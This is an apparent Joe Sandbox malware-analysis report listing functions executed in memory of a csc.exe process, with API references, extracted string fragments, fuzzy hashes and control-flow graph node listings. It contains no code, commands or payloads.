                                                                  Similarity
                                                                  • API ID: _memcpy_s$Exception@8Throw
                                                                  • String ID: Core\
                                                                  • API String ID: 93487992-2534804690
                                                                  • Opcode ID: a8657365fd312069ee0ef6f088e6ad1ec9ad73d0cb6b13340a8482a65472dfbb
                                                                  • Instruction ID: 96814e4bfe430db7b348c38a6644ee4befebf0edd7ee54b93e1ec2a703856812
                                                                  • Opcode Fuzzy Hash: a8657365fd312069ee0ef6f088e6ad1ec9ad73d0cb6b13340a8482a65472dfbb
                                                                  • Instruction Fuzzy Hash: CA01C4317006149FD710DF6ACC84D6AB7E9EF89364B04406AFC0A9B355C675AC408BE4

                                                                  Execution Graph

                                                                  Execution Coverage:10.4%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:12
                                                                  Total number of Limit Nodes:1
                                                                  execution_graph 34253 698f828 34254 698f868 CloseHandle 34253->34254 34256 698f899 34254->34256 34241 95f2758 34244 95f2763 34241->34244 34242 95f2967 34243 95f27ed KiUserExceptionDispatcher 34243->34244 34244->34242 34244->34243 34245 698f5c0 34247 698f5d3 34245->34247 34249 698f678 34247->34249 34250 698f6c0 VirtualProtect 34249->34250 34252 698f65b 34250->34252

                                                                  Executed Functions

                                                                  Function 094B073F Relevance: 3.6, Strings: 2, Instructions: 1145COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4$T'I
                                                                  • API String ID: 0-996338084
                                                                  • Opcode ID: ecef011570c5c8eeb8ac82eb40f99b7eef79b59a8c7a0e0bd31554048eda8838
                                                                  • Instruction ID: e87593aad831daa1e733e784fb39b34f55e2c0a057498b13bfaf00b08f2f25dd
                                                                  • Opcode Fuzzy Hash: ecef011570c5c8eeb8ac82eb40f99b7eef79b59a8c7a0e0bd31554048eda8838
                                                                  • Instruction Fuzzy Hash: 69B20934A00218DFDB14CFA9C894BAEB7B5BF49305F14819AE505AB3A5DB71DD81CF60
                                                                  Function 094B0A77 Relevance: 3.0, Strings: 2, Instructions: 495COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4$T'I
                                                                  • API String ID: 0-996338084
                                                                  • Opcode ID: 4985f701f3af93749bbaac9e26f03add7b3954157ad1dde5335e06917ce29b1c
                                                                  • Instruction ID: f1f2c3b3b7e13bc7702346ed14758009c92cfaa2b2b2d3eb95686e3c338acb77
                                                                  • Opcode Fuzzy Hash: 4985f701f3af93749bbaac9e26f03add7b3954157ad1dde5335e06917ce29b1c
                                                                  • Instruction Fuzzy Hash: 9C22FA34A04218CFDB24DF64C994BAEB7B6BF48305F1481AAE509AB395DB71DD81CF60
                                                                  Function 094C258B Relevance: 2.9, Strings: 2, Instructions: 355COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1281 94c258b-94c25f7 1287 94c25f9-94c264d 1281->1287 1288 94c2656-94c2668 1281->1288 1287->1288 1309 94c264f 1287->1309 1291 94c266e-94c2691 1288->1291 1292 94c271b-94c2759 1288->1292 1300 94c270b-94c2714 1291->1300 1312 94c275b-94c27d0 1292->1312 1313 94c27d2-94c280c 1292->1313 1302 94c26ab-94c26b4 1300->1302 1303 94c2716 1300->1303 1306 94c2dda-94c2ddf 1302->1306 1307 94c26ba-94c26db 1302->1307 1305 94c28c2-94c2906 1303->1305 1327 94c290c-94c292d 1305->1327 1328 94c2ada-94c2ae0 1305->1328 1307->1306 1315 94c26e1-94c2705 1307->1315 1309->1288 1325 94c2813-94c281e 1312->1325 1313->1325 1331 94c270a 1315->1331 1332 94c2707 1315->1332 1325->1305 1330 94c2824-94c282d 1325->1330 1337 94c2ac1-94c2ad4 1327->1337 1338 94c2933 1327->1338 1381 94c2ae2 call 94c3fa8 1328->1381 1382 94c2ae2 call 94c3fb0 1328->1382 1330->1306 1333 94c2833-94c284d 1330->1333 1331->1300 1332->1331 1362 94c284f-94c2861 1333->1362 1363 94c2883-94c2895 1333->1363 1336 94c2ae8-94c2b03 1353 94c2b0b 1336->1353 1337->1327 1337->1328 1342 94c2a7e-94c2a8a 1338->1342 1343 94c2a28-94c2a51 1338->1343 1344 94c2a98-94c2aba 1338->1344 1345 94c293a-94c2946 1338->1345 1346 94c29da-94c2a23 1338->1346 1347 94c2994-94c29bf 1338->1347 1348 94c2957-94c298f 1338->1348 1349 94c2a53-94c2a7c 1338->1349 1342->1306 1354 94c2a90-94c2a96 1342->1354 1343->1337 1344->1337 1345->1306 1352 94c294c-94c2952 1345->1352 1346->1337 1368 94c29c7-94c29d5 1347->1368 1348->1337 1349->1337 1352->1337 1353->1306 1354->1337 1362->1306 1364 94c2867-94c2881 1362->1364 1363->1306 1365 94c289b-94c28ab 1363->1365 1380 94c28b2-94c28bc 1364->1380 1365->1380 1368->1337 1380->1305 1380->1330 1381->1336 1382->1336
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630645817.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: lL%$lL%
                                                                  • API String ID: 0-905456599
                                                                  • Opcode ID: 22394fdbb8ceda287638e02d281c81e9c69386d8bb824b82f8ebf54695468aa0
                                                                  • Instruction ID: 94d6375c72fc8da4c95677c5065af7f6cea95d8d76bb43bdaac087f161e36163
                                                                  • Opcode Fuzzy Hash: 22394fdbb8ceda287638e02d281c81e9c69386d8bb824b82f8ebf54695468aa0
                                                                  • Instruction Fuzzy Hash: A2F12C74A00218CFCB55DF28C884AA9B7B2FF88301F5586D9D91A9B361DB71ED82CF51
                                                                  Function 095F2758 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 095F27F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630738644.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: 4b88273c9555d178bc51464685d3de801e60d1811da43f81186989a780d64dc5
                                                                  • Instruction ID: edc039e182bc61728454ac5bf97a7b7e3c24a29cc8a5c1451e3f9d043c44f410
                                                                  • Opcode Fuzzy Hash: 4b88273c9555d178bc51464685d3de801e60d1811da43f81186989a780d64dc5
                                                                  • Instruction Fuzzy Hash: BF512DB83001508FC388EBBAE1A5B6A33E2BB8D711F06847DD55ACB391DE789D41C755
                                                                  Function 094B4D00 Relevance: 15.5, Strings: 12, Instructions: 484COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 94b4d00-94b4d1a 2 94b4d1f-94b4d2c 0->2 3 94b4d1c 0->3 5 94b4d2e-94b4d34 2->5 6 94b4d75 2->6 3->2 7 94b4d68-94b4d70 5->7 8 94b4d36-94b4d38 5->8 10 94b4d7e-94b4d86 6->10 9 94b51c8-94b51cf 7->9 8->7 11 94b4d3a-94b4d63 8->11 12 94b4d88 10->12 13 94b4d8f-94b4d95 10->13 11->9 12->13 14 94b4fea-94b5004 12->14 15 94b5009-94b5019 12->15 16 94b4e88-94b4e98 12->16 17 94b4f6f-94b4f88 12->17 18 94b4eed-94b4efd 12->18 19 94b4f8d-94b4fae 12->19 20 94b4f02-94b4f1b 12->20 21 94b4da2-94b4dbb 12->21 22 94b4f20-94b4f39 12->22 23 94b4dc0-94b4dd9 12->23 24 94b4e1a-94b4e26 12->24 25 94b4f3e-94b4f4c 12->25 26 94b4dde-94b4df7 12->26 27 94b501e-94b502a 12->27 28 94b4e9d-94b4eab 12->28 29 94b4dfc-94b4e15 12->29 30 94b4e73-94b4e83 12->30 31 94b4fb3-94b4fb6 12->31 32 94b4f51-94b4f6a 12->32 33 94b4eb0-94b4ed1 12->33 34 94b4fd5-94b4fe5 12->34 13->27 35 94b4d9b 13->35 14->9 15->9 16->9 17->9 18->9 19->9 20->9 21->9 22->9 23->9 37 94b4e28-94b4e5f 24->37 38 94b4e64-94b4e6e 24->38 25->9 26->9 39 94b502c-94b502e 27->39 40 94b5030-94b5033 27->40 28->9 29->9 30->9 41 94b4fb8-94b4fbd 31->41 42 94b4fbf 31->42 32->9 83 94b4ed3-94b4ed5 33->83 84 94b4ed7-94b4ee1 33->84 34->9 35->14 35->15 35->19 35->21 35->31 35->34 37->9 38->9 48 94b503b-94b503f 39->48 40->48 43 94b4fc4-94b4fd0 41->43 42->43 43->9 66 94b504e-94b5054 48->66 67 94b5041-94b5049 48->67 69 94b505a-94b5072 66->69 70 94b51c0-94b51c6 66->70 67->9 88 94b509f-94b50a9 69->88 89 94b5074-94b5083 call 94b22e8 69->89 70->9 86 94b4ee3-94b4ee8 83->86 84->86 86->9 92 94b50af-94b50ba 88->92 93 94b5182-94b5186 88->93 89->88 99 94b5085-94b5098 89->99 97 94b50ca-94b50d0 92->97 98 94b50bc-94b50c7 92->98 93->70 95 94b5188-94b518d 93->95 102 94b518f-94b5194 95->102 103 94b5196 95->103 100 94b50d2-94b50dd 97->100 101 94b50e0-94b50e4 97->101 98->97 99->88 107 94b509a 99->107 100->101 104 94b514a-94b514f 101->104 105 94b50e6-94b50ec 101->105 106 94b519b-94b51be 102->106 103->106 110 94b5158 104->110 111 94b5151-94b5156 104->111 108 94b50ee-94b50fe 105->108 109 94b5104-94b510a 105->109 106->9 107->88 108->109 119 94b51d2-94b51f2 108->119 112 94b512b-94b513a 109->112 113 94b510c-94b511b 109->113 114 94b515d-94b5180 110->114 111->114 112->104 118 94b513c-94b5147 112->118 113->112 117 94b511d-94b5128 113->117 114->9 117->112 118->104 125 94b5205-94b521e 119->125 126 94b51f4-94b5203 119->126 129 94b5220-94b52b8 125->129 126->129 135 94b52ba 129->135 136 94b52c3-94b52cf 129->136 135->136 137 94b52c1 135->137 140 94b52d8-94b52e4 136->140 141 94b52d1-94b52d6 136->141 138 94b5331-94b5333 137->138 143 94b52ed-94b52f9 140->143 144 94b52e6-94b52eb 140->144 141->138 146 94b52fb-94b5300 143->146 147 94b5302-94b530e 143->147 144->138 146->138 149 94b5310-94b5315 147->149 150 94b5317-94b5323 147->150 149->138 152 94b532c 150->152 153 94b5325-94b532a 150->153 152->138 153->138
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DDI$PCI$d3I$d3I$h0I$l1I$p/I$p/I$p2I$x.I$8I$9I
                                                                  • API String ID: 0-3502836740
                                                                  • Opcode ID: c6b8b4a91a18fa41217e3b816fd148ddeca8d5cfbd23c4b8cff3937f31e7b0bf
                                                                  • Instruction ID: ab0f3758f0506ad09b368dc9e5cfcb56708d57d8b520f55260a3b9143ba26cd7
                                                                  • Opcode Fuzzy Hash: c6b8b4a91a18fa41217e3b816fd148ddeca8d5cfbd23c4b8cff3937f31e7b0bf
                                                                  • Instruction Fuzzy Hash: E002F370B042029FDB599F29D8806AEBBF2EF95301F14456BF942DF3A1CA369C428771
                                                                  Function 094C1B6D Relevance: 8.2, Strings: 6, Instructions: 661COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 154 94c1b6d-94c1bb7 155 94c1bbe-94c1bd0 154->155 156 94c1bb9 154->156 158 94c1bdf-94c1beb 155->158 159 94c1bd2 155->159 156->155 160 94c2479 158->160 161 94c1bf1-94c1bf6 158->161 359 94c1bd9 call 94c2db8 159->359 360 94c1bd9 call 94c2e58 159->360 361 94c1bd9 call 94c2e49 159->361 362 94c1bd9 call 94c2d9a 159->362 165 94c247e-94c2482 160->165 162 94c1bf8-94c1c01 161->162 163 94c1c29-94c1c49 161->163 162->160 164 94c1c07-94c1c24 162->164 163->160 177 94c1c4f-94c1d32 163->177 168 94c2578-94c257e 164->168 166 94c2484 165->166 167 94c2435-94c244c 165->167 170 94c24ad-94c24cf 166->170 171 94c248b-94c24a8 166->171 172 94c24d4-94c24f3 166->172 173 94c24f5-94c2514 166->173 174 94c2516-94c253c 166->174 193 94c2457-94c246e 167->193 175 94c2588 168->175 176 94c2580 168->176 192 94c256b-94c2573 170->192 171->192 172->192 173->192 194 94c253e-94c2555 174->194 195 94c2565 174->195 176->175 214 94c1d38-94c1d44 177->214 215 94c20e7-94c2118 177->215 192->168 193->160 194->160 200 94c255b-94c2563 194->200 195->192 200->194 200->195 214->160 216 94c1d4a-94c1d99 214->216 222 94c217d-94c21ae 215->222 223 94c211a-94c2146 215->223 234 94c1d9b-94c1da4 216->234 235 94c1da6-94c1dce 216->235 236 94c21b4-94c2251 222->236 237 94c22b6-94c22fe 222->237 238 94c2148-94c214b 223->238 239 94c2160-94c217b 223->239 234->235 256 94c1dda-94c1e02 235->256 257 94c1dd0-94c1dd5 235->257 288 94c2279-94c227c 236->288 289 94c2253-94c2277 236->289 246 94c235b-94c2367 237->246 247 94c2300-94c2355 237->247 238->239 240 94c214d-94c215d 238->240 239->222 239->223 240->239 251 94c236e-94c239f 246->251 247->246 266 94c240e-94c2430 251->266 267 94c23a1-94c23d1 251->267 272 94c1e0e-94c1e36 256->272 273 94c1e04-94c1e09 256->273 259 94c20cf-94c20e1 257->259 259->214 259->215 266->168 267->193 281 94c23d7-94c23df 267->281 286 94c1e38-94c1e3d 272->286 287 94c1e42-94c1e70 272->287 273->259 281->160 282 94c23e5-94c23ec 281->282 282->165 285 94c23f2-94c240c 282->285 285->266 285->267 286->259 302 94c1e7c-94c1eaa 287->302 303 94c1e72-94c1e77 287->303 290 94c227e-94c228d 288->290 291 94c228f 288->291 296 94c229b-94c22b0 289->296 290->296 291->296 296->236 296->237 307 94c1eac-94c1eb1 302->307 308 94c1eb6-94c1ee4 302->308 303->259 307->259 312 94c1ee6-94c1eeb 308->312 313 94c1ef0-94c1f1e 308->313 312->259 317 94c1f2a-94c1f58 313->317 318 94c1f20-94c1f25 313->318 322 94c1f5a-94c1f5f 317->322 323 94c1f64-94c1f8c 317->323 318->259 322->259 327 94c1f8e-94c1f93 323->327 328 94c1f98-94c1fc0 323->328 327->259 332 94c1fcc-94c1ff4 328->332 333 94c1fc2-94c1fc7 328->333 337 94c1ff6-94c1ffb 332->337 338 94c2000-94c2028 332->338 333->259 337->259 342 94c202a-94c202f 338->342 343 94c2034-94c205c 338->343 342->259 347 94c205e-94c2063 343->347 348 94c2065-94c2093 343->348 347->259 352 94c209c-94c20c4 348->352 353 94c2095-94c209a 348->353 357 94c20cd 352->357 358 94c20c6-94c20cb 352->358 353->259 357->259 358->259 359->158 360->158 361->158 362->158
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630645817.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: >%$2$`=%$|e%$h%$l%
                                                                  • API String ID: 0-1115436034
                                                                  • Opcode ID: 54c5ad47c0a76101e7f81ffe8582737dedd953cd2c28eb858b713d623c024bdf
                                                                  • Instruction ID: 44eecda0ddef9716d891aedadc305fc24e11648849d9d5848b6313ffb29d21fe
                                                                  • Opcode Fuzzy Hash: 54c5ad47c0a76101e7f81ffe8582737dedd953cd2c28eb858b713d623c024bdf
                                                                  • Instruction Fuzzy Hash: B15227B4A00254CFDB94DF64D884B9EB7B2BF89300F1080AAD51A9B355DBB0ED81CF51
                                                                  Function 094C6C90 Relevance: 5.1, Strings: 4, Instructions: 131COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 363 94c6c90-94c6c9b 364 94c6ca0 363->364 365 94c6ca2-94c6ca5 364->365 366 94c6ca7 365->366 367 94c6cd3-94c6cd5 365->367 366->367 368 94c6cae-94c6cb3 366->368 369 94c6d5f-94c6d61 366->369 370 94c6d15-94c6d20 366->370 371 94c6d66-94c6d72 366->371 372 94c6cc0-94c6cd1 366->372 373 94c6d30-94c6d32 366->373 374 94c6dd1-94c6dd3 366->374 375 94c6d82-94c6d84 366->375 376 94c6cef-94c6cfd 367->376 377 94c6cd7-94c6cdd 367->377 368->371 379 94c6cb9-94c6cbe 368->379 378 94c6e23-94c6e27 369->378 398 94c6dae-94c6db8 370->398 399 94c6d26-94c6d2b 370->399 371->372 402 94c6d78-94c6d7d 371->402 372->365 384 94c6d4c-94c6d5a 373->384 385 94c6d34-94c6d3a 373->385 380 94c6ded-94c6dfb 374->380 381 94c6dd5-94c6ddb 374->381 382 94c6d9e-94c6da6 375->382 383 94c6d86-94c6d8c 375->383 376->378 386 94c6cdf 377->386 387 94c6ce1-94c6ced 377->387 379->364 380->378 389 94c6ddd 381->389 390 94c6ddf-94c6deb 381->390 404 94c6dac 382->404 395 94c6d8e 383->395 396 94c6d90-94c6d9c 383->396 384->378 391 94c6d3c 385->391 392 94c6d3e-94c6d4a 385->392 386->376 387->376 389->380 390->380 391->384 392->384 395->382 396->382 409 94c6dfd-94c6e07 398->409 410 94c6dba-94c6dc6 call 94c4030 398->410 399->365 402->365 404->378 415 94c6e0d-94c6e16 call 94c4030 409->415 416 94c6d02-94c6d0c 409->416 410->365 414 94c6dcc 410->414 414->365 415->365 421 94c6e1c-94c6e1e 415->421 416->373 420 94c6d0e-94c6d13 416->420 420->365 421->365
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630645817.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: X/%$X/%$`*%$`*%
                                                                  • API String ID: 0-1005421330
                                                                  • Opcode ID: 2618373033c5aac724c5905c616b0016fc29c4ffdceccfee935b4d946ba92d4c
                                                                  • Instruction ID: 4b43b3075949006642054b26a8c80439e42543e1bf500a41fb72cc3e5fb2ae51
                                                                  • Opcode Fuzzy Hash: 2618373033c5aac724c5905c616b0016fc29c4ffdceccfee935b4d946ba92d4c
                                                                  • Instruction Fuzzy Hash: 6A41A4B97281228FCBA45E25D02473A37E6BF85B51B07C06FE806CB351DA76CC4287A1
                                                                  Function 094BE488 Relevance: 4.1, Strings: 3, Instructions: 366COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 422 94be488-94be4a8 423 94be4ae-94be4b2 422->423 424 94be5c1-94be5e6 422->424 425 94be4b8-94be4c1 423->425 426 94be5ed-94be612 423->426 424->426 428 94be619-94be64f 425->428 429 94be4c7-94be4ee 425->429 426->428 445 94be656-94be6ac 428->445 438 94be5b6-94be5c0 429->438 439 94be4f4-94be4f6 429->439 442 94be4f8-94be4fb 439->442 443 94be517-94be519 439->443 444 94be501-94be50b 442->444 442->445 446 94be51c-94be520 443->446 444->445 448 94be511-94be515 444->448 463 94be6ae-94be6c2 445->463 464 94be6d0-94be6e7 445->464 449 94be522-94be531 446->449 450 94be581-94be58d 446->450 448->443 448->446 449->445 457 94be537-94be57e call 94b05b0 449->457 450->445 451 94be593-94be5b0 call 94b05b0 450->451 451->438 451->439 457->450 541 94be6c5 call 94beb9a 463->541 542 94be6c5 call 94beba8 463->542 543 94be6c5 call 94bed08 463->543 544 94be6c5 call 94bec80 463->544 474 94be6ed-94be7d2 call 94b8588 call 94b7f90 call 94bd690 call 94b7f90 call 94b85c8 call 94bc618 call 94b7f90 call 94bae78 call 94b8e30 464->474 475 94be7d7-94be7e7 464->475 470 94be6cb 472 94be8f9-94be904 470->472 480 94be933-94be954 call 94b86d8 472->480 481 94be906-94be916 472->481 474->475 482 94be7ed-94be8c6 call 94b8588 * 2 call 94b8d40 call 94b7f90 call 94bd690 call 94b7f90 call 94b8240 call 94b86d8 call 94b7f90 475->482 483 94be8d4-94be8f0 call 94b7f90 475->483 495 94be918-94be91e 481->495 496 94be926-94be92e call 94b8e30 481->496 538 94be8c8 482->538 539 94be8d1 482->539 483->472 495->496 496->480 538->539 539->483 541->470 542->470 543->470 544->470
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 85I$85I$h`I
                                                                  • API String ID: 0-3077104230
                                                                  • Opcode ID: d721902b6f8b20e272b32d326418bd2505155f3c4cd7dcec0aa0fe1b4d2df1c7
                                                                  • Instruction ID: bb8286525ca74fb185afff85ac8d743e69a0fc4a1e525a20f31c5982e74412f9
                                                                  • Opcode Fuzzy Hash: d721902b6f8b20e272b32d326418bd2505155f3c4cd7dcec0aa0fe1b4d2df1c7
                                                                  • Instruction Fuzzy Hash: 58F12234A00209DFCB18EF64D494A9E7BB6EFC9301F508569E805AF365DB30ED46CBA1
                                                                  Function 094BB8B8 Relevance: 4.0, Strings: 3, Instructions: 289COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <rI$h`I$h`I
                                                                  • API String ID: 0-28198490
                                                                  • Opcode ID: 6c87ea5d3a0cdc8fb1769767de5456eb0a5f3b5fbbb712d0bfc5c8262613efeb
                                                                  • Instruction ID: f150fa170835fb62c0f64d7ec09abcd3ba82023328213117c39097c3807a9e08
                                                                  • Opcode Fuzzy Hash: 6c87ea5d3a0cdc8fb1769767de5456eb0a5f3b5fbbb712d0bfc5c8262613efeb
                                                                  • Instruction Fuzzy Hash: 90C1B775A10218CFCB08DFA8C994A9DB7B6FF89304F104169E506AB3A5DB71EC42CF50
                                                                  Function 094B7BF0 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 635 94b7bf0-94b7c47 651 94b7c49 call 94b7d88 635->651 652 94b7c49 call 94b7d62 635->652 639 94b7c4f-94b7c6a 653 94b7c6d call 94b8340 639->653 654 94b7c6d call 94b8350 639->654 642 94b7c73-94b7cca 646 94b7ccc-94b7cd2 642->646 647 94b7ce2-94b7d55 642->647 648 94b7cd6-94b7cd8 646->648 649 94b7cd4 646->649 648->647 649->647 651->639 652->639 653->642 654->642
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: t^I$t^I$t^I
                                                                  • API String ID: 0-3020131588
                                                                  • Opcode ID: fe86b929ea24904680eabe82f44dd208774cc203f2493761e15ebc567ec6d32d
                                                                  • Instruction ID: df08c7580beb415369b8df1b93e6880e0224e9f95c54d7dc23937da457ef520f
                                                                  • Opcode Fuzzy Hash: fe86b929ea24904680eabe82f44dd208774cc203f2493761e15ebc567ec6d32d
                                                                  • Instruction Fuzzy Hash: 953152316001049FDF09DF64D854AAEBBB6FF9D310B2541AEE906AB371DB72AC12CB51
                                                                  Function 094B6570 Relevance: 2.8, Strings: 2, Instructions: 342COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1383 94b6570-94b6582 1384 94b65ac-94b65b0 1383->1384 1385 94b6584-94b65a5 1383->1385 1386 94b65bc-94b65cb 1384->1386 1387 94b65b2-94b65b4 1384->1387 1385->1384 1388 94b65cd 1386->1388 1389 94b65d7-94b6603 1386->1389 1387->1386 1388->1389 1393 94b6609-94b660f 1389->1393 1394 94b6830-94b6877 1389->1394 1395 94b66e1-94b66e5 1393->1395 1396 94b6615-94b661b 1393->1396 1425 94b6879 1394->1425 1426 94b688d-94b6899 1394->1426 1400 94b6708-94b6711 1395->1400 1401 94b66e7-94b66f0 1395->1401 1396->1394 1399 94b6621-94b662e 1396->1399 1404 94b66c0-94b66c9 1399->1404 1405 94b6634-94b663d 1399->1405 1402 94b6713-94b6733 1400->1402 1403 94b6736-94b6739 1400->1403 1401->1394 1406 94b66f6-94b6706 1401->1406 1402->1403 1408 94b673c-94b6742 1403->1408 1404->1394 1409 94b66cf-94b66db 1404->1409 1405->1394 1410 94b6643-94b665b 1405->1410 1406->1408 1408->1394 1412 94b6748-94b675b 1408->1412 1409->1395 1409->1396 1413 94b665d 1410->1413 1414 94b6667-94b6679 1410->1414 1412->1394 1416 94b6761-94b6771 1412->1416 1413->1414 1414->1404 1420 94b667b-94b6681 1414->1420 1416->1394 1419 94b6777-94b6784 1416->1419 1419->1394 1422 94b678a-94b679f 1419->1422 1423 94b668d-94b6693 1420->1423 1424 94b6683 1420->1424 1422->1394 1434 94b67a5-94b67c8 1422->1434 1423->1394 1427 94b6699-94b66bd 1423->1427 1424->1423 1428 94b687c-94b687e 1425->1428 1430 94b689b 1426->1430 1431 94b68a5-94b68c1 1426->1431 1432 94b68c2-94b68c9 1428->1432 1433 94b6880-94b688b 1428->1433 1430->1431 1441 94b68cb-94b68ef call 94b1780 1432->1441 1442 94b68f6-94b68f7 1432->1442 1433->1426 1433->1428 1434->1394 1439 94b67ca-94b67d5 1434->1439 1443 94b67d7-94b67e1 1439->1443 1444 94b6826-94b682d 1439->1444 1449 94b6907-94b6909 1441->1449 1451 94b68f1 1441->1451 1446 94b68fb-94b68fd 1442->1446 1447 94b68f9 1442->1447 1443->1444 1453 94b67e3-94b67f9 1443->1453 1446->1449 1447->1449 1471 94b690b call 94b6988 1449->1471 1472 94b690b call 94b7b30 1449->1472 1451->1442 1452 94b6911-94b6915 1454 94b6960-94b6970 1452->1454 1455 94b6917-94b692e 1452->1455 1459 94b67fb 1453->1459 1460 94b6805-94b681e 1453->1460 1455->1454 1463 94b6930-94b693a 1455->1463 1459->1460 1460->1444 1466 94b694d-94b695d 1463->1466 1467 94b693c-94b694b 1463->1467 1467->1466 1471->1452 1472->1452
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: d$y+
                                                                  • API String ID: 0-3511421163
                                                                  • Opcode ID: b518b199765e62fa5250e6c8d8319a5418b75080f9ea010cacddce25898f439b
                                                                  • Instruction ID: d7575dc979898ade80bdc8e1ddb1d3e37b5ed9e315f847a90dd6421be407d135
                                                                  • Opcode Fuzzy Hash: b518b199765e62fa5250e6c8d8319a5418b75080f9ea010cacddce25898f439b
                                                                  • Instruction Fuzzy Hash: 26D15D35600605CFCB14CF28C5849AAB7F6FF88324B16856AE45A9F765DB31FC46CBA0
                                                                  Function 094B9D40 Relevance: 2.8, Strings: 2, Instructions: 301COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
